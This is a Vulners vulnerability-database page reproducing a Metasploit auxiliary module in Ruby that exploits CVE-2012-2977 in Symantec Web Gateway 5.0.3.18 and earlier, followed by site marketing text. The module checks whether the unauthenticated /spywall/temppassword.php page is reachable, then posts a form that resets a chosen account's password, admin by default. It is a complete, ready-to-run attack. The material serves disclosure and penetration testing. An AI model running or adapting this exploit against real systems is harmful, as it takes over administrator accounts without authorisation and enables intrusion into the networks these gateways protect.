Vulners
Lucene search
Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF)
##
# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
'Description' => %q{
This module will change the password for the specified account on a Symantec Web Gatewaye server.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 0 $",
'Author' =>
[
'Kc57',
],
'References' =>
[
[ 'CVE', '2012-2977' ],
[ 'OSVDB', '0' ],
[ 'BID', '54430' ],
[ 'URL', 'http://www.securityfocus.com/bid/54430' ],
],
'DisclosureDate' => "Jul 23 2012" ))
register_options(
[
Opt::RPORT(80),
OptString.new('USER', [ true, 'The password to reset to', 'admin']),
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
], self.class)
end
def run
print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
res = send_request_raw(
{
'method' => 'POST',
'uri' => '/spywall/temppassword.php',
}, 25)
#check to see if we get HTTP OK
if (res.code == 200)
print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
else
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to if the temppassword.php page loads or if we are redirected to the login page
if (res.body.match(/Please Select a New Password/i))
print_status("Server is vulnerable!")
else
print_error("Target doesn't seem to be vulnerable!")
return
end
print_status("Attempting to exploit password change vulnerability on #{rhost}")
print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")
data = 'target=executive_summary.php'
data << '&USERNAME=' + datastore['USER']
data << '&password=' + datastore['PASSWORD']
data << '&password2=' + datastore['PASSWORD']
data << '&Save=Save'
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/spywall/temppassword.php',
'data' => data,
}, 25)
if res.code == 200
if (res.body.match(/Thank you/i))
print_status("Password reset was successful!\n")
else
print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
end
else
print_error("Password reset failed!")
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7